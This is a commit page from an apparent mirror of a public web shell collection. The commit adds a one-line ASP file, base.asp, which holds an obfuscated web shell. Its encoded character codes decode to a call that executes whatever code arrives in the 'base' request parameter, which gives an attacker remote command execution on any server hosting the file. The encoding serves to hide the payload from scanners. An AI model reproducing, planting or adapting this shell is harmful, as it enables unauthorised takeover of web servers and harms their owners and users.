mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create base.asp
password : base from : zone.wooyun.org
This commit is contained in:
parent
fe87858978
commit
a9c343b74e
1 changed files with 1 additions and 0 deletions
1
asp/base.asp
Normal file
1
asp/base.asp
Normal file
|
@ -0,0 +1 @@
|
|||
<%Execute(DeAsc("%119%136%115%126%50%132%119%131%135%119%133%134%58%52%116%115%133%119%52%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>
|
Loading…
Reference in a new issue